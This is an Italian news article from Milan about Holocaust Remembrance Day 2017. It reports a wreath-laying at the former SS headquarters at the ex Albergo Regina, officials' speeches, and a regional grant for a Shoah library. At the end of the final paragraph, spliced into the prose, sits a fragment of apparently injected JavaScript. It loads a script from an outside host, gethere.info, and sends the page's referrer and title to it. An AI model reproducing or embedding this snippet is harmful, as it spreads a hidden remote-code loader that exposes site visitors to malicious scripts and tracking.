"/>
mercoledì 23 agosto 2017 10:01:30
omnimilano

Giorno della Memoria, corone all’ex Albergo Regina: “Milano resta fedele al suo impegno civile”

27 gennaio 2017 Politica

‘Ricordare’ ma anche ‘tramandare’ la testimonianza dei crimini nazifascisti alle giovani generazioni . Questo il messaggio lanciato in occasione della commemorazione per il Giorno della memoria davanti all’ex Albergo Regina, in via Silvio Pellico – nel ’43 diventato quartiere generale delle SS a Milano – alla quale sono intervenuti il presidente del Consiglio comunale Lamberto Bertolè, la vice presidente del Consiglio Regionale Sara Valmaggi, il presidente del Comitato permanente antifascista Giuliano Banfi e il vice presidente del Memoriale della Shoah ed esponente della Comunità ebraica milanese Roberto Jarach. Davanti alla lapide che ricorda che in quel luogo “furono reclusi, torturati e assassinati” decine di uomini e donne sono state deposte corone di alloro. “Milano resta fedele allo spirito che ha animato gli anni della Resistenza e vuole continuare ad essere modello di impegno civile e partecipazione democratica”, ha detto Bertolè, mentre Valmaggi ha sottolineato l’importanza di continuare a tenere viva la memoria delle vittime del nazifascismo anche se, ha osservato “in questi anni non è bastato a evitare ulteriori stermini”. Da Banfi invece il monito a “non dimenticare il prezzo pagato per la conquista democratica”. Jarach poi ha infine ha ricordato che “Milano è una città che ha sempre accolto la comunità ebraica e non merita manifestazioni di intolleranza” come il recente imbrattamento della pietra di inciampo dedicata a Dante Coen.

APREA: DA REGIONE 1,2 MLN PER BIBLIOTECA DELLA SHOAH – “Per la costruzione della biblioteca della Shoah e dell’archivio della memoria la giunta regionale lunedi’ stanziera’ 1,2 milioni su proposta del presidente Roberto Maroni e dell’assessore alle Culture, Identita’ e Autonomie della Lombardia Cristina Cappellini. Questo e’ il nostro segno concreto di grande attenzione alla memoria di quei fatti che ricordiamo oggi”. Lo ha annunciato l’assessore all’Istruzione, Formazione e Lavoro della Regione Lombardia Valentina Aprea intervenuta oggi alla commemorazione del XVII ‘Giorno della Memoria’ che si e’ tenuta al Teatro degli Arcimboldi alla presenza di Liliana Segre e del presidente della Fondazione Memoriale della Shoah di Milano Ferruccio de Bortoli.

SALA: DISSEMINARE LA CITTÀ DI SEGNI  -“Cercheremo di disseminare la città di segni” per mantenere viva la memoria dei crimini del nazifascismo. A dirlo il sindaco Giuseppe Sala intervenendo davanti agli studenti in un convegno a Palazzo Reale, organizzato nell’ambito del Giorno della Memoria. “Milano deve immaginare di avere la leadership anche dal punto di vista sociale e politico – ha detto – e questo vuol dire essere all’avanguardia nei diritti, nell’interpretazione della contemporaneità e dobbiamo essere quelli che più tengono viva la memoria, non solo nei dibattiti ma anche nella città”. Da qui l’impegno del sindaco a “disseminare la città di segni” e l’invito ai giovani a recarsi su luoghi simbolo delle deportazioni come l’ex Albergo Regina e il Binario 21 con il Memoriale della Shoah. “A Milano – a concluso Sala – si deve creare un racconto stabile della memoria”.s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Condividi questo articolo